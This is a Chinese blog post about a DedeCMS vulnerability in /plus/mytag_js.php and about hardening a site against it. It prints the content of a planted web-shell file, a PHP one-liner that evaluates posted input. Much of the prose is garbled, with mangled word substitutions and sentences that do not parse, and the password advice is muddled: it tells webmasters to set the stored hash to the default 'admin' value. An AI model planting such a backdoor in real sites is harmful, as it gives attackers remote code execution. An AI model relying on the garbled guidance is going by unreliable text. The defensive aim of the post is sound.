谈织梦DedeCMS近期的一些隐患及如何预防风险

  • 时间:
  • 浏览:3
作者:匿名 hihi 来源:爱不网 浏览: 2012-2-3 11:45:10 字号:大 中 小

[摘要]本文浅谈一下织梦DedeCMS近期的却说隐患及如保预防风险,下面那此预防漏洞被利用的步骤,希望对同样适用dedecms的站长他们 们有所帮助。

  DedeCMS老要是很火的建站cms,主要得益于两大站长网的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站老要在使用dedecms,前段时间又一次受到攻击,攻击的目的很简单,这么便是黑链,知道后稍微修改下代码就恢复了,后该 很严重;这段时间网站又被莫名上传文件,累似 前一次,我觉得对方还没来得及修改网站模板,不过这说明网站安全防患还未到位,对方任何如果都将会再次取得管理员权限,却说多有点儿注意网站的安全防患法律辦法 。

  将会我比较喜欢寻根究底,却说就去网上找了一下相关的资料,发现这我觉得是dedecms的漏洞,黑客都需用利用多维的变量绕过正则检测,漏洞主要指在在/plus/mytag_js.php中,原理便是准备有4个MySQL数据库来攻击已知网站的数据库,通过向数据库中写入得话的代码,假如成功写入,这么如果便都需用利用那此代码来获得后台管理员权限。

  结合我的网站被攻击将会别人累似 的经历来看,黑客写入的文件主要指在于/plus/文件夹下,目前已知的几块文件包括ga.php、log.php、b.php、b1.php等,文件的型态便是短小,内容很少,将会写入的如果后该 很方便,不过那此代码的作用我觉得不小的。

  下面这是ga.php文件中的每项代码:

<title>login</title>no<?php

eval($_POST[1])

?>

<title>login</title>no<?php

eval($_POST[1])

?>

<title>login</title>no<?php

eval($_POST[1])

?>

  实际的代码比里面截取的要长,不如果该 这段代码的重复,至于log.php的代码,同并否有累似 ,能够得话,简单明了,将会你对网络安全稍有了解,这么会知道<?php eval($_POST[1]);?>是php得话木马,使用每项指定的工具都需用执行这段代码,预计是破解密码的功能。

  既然将会知道对方是利用那此样的漏洞,一起去知道对方利用那此样的原理来利用漏洞,这么要为啥预防那此危险的事指在呢?经过查询少量的资料,我初步整理出下面那此预防漏洞被利用的步骤,希望对同样适用dedecms的站长他们 们有所帮助

  一、升级版本打好补丁设置目录权限

  这是官方对此的解决法律辦法 ,不管你使用的是那此版本的dedecms,后该 及时在后台升级版本自动更新补丁,这是解决漏洞被利用的最重要的一步;一起去官方还提供设置目录的法律辦法 ,主却说设置data、templets、uploads、a为可读写不可执行权限;include、member、plus、后台管理目录等设置为可执行可读不可写入权限;删除install及special目录,具体如保设置见官方说明。

  二、修改admin账号及密码

  黑客将会是利用默认admin账号,如果推测密码来破解的,却说修改默认的admin账号非常重要,至于如保修改,法律辦法 却说,比较有效的是用phpadmin登陆网站数据库,找到dede_admin数据库表(dede是数据库表前缀),修改其中userid及pwd两项,其中密码一定要修改成f297a57a5a743894a0e4,这是默认的密码admin;修改后去后台登陆,登陆dede后台后修改密码。

  三、别的值得注意的地方

  至于更多的细节,同样要注意,尽量别选用太廉价的空间,太廉价的空间很容易出现服务器并否有的安全什么的什么的问题,假如服务器出现什么的什么的问题,整个服务器下面的网站都没救了。还有便是,将会没必要,尽量别开通会员注册那此的,使用起来很麻烦;至于网站后台目录,何必 写到robots.txt里面,一起去每个月共要换一次,管理员密码那此的同样要更换,解决和别的账号密码相同被推测出来。

  经过这几块网站被攻击的实例,不得不说,互联网后该 有4个都需用安心睡大觉的网,作为站长,否有织网的人,更应该注重网络安全;假如按照要求去做到了那此防范法律辦法 ,不说200%,共要95%的将会不多被顺利取得后台权限。

DedeCms下载:

本文由爱不网(http://www.aibue.com)原创

sssss
Tags: dedecms   织梦CMS   dedecms教程   dedecms漏洞  
责任编辑:cc120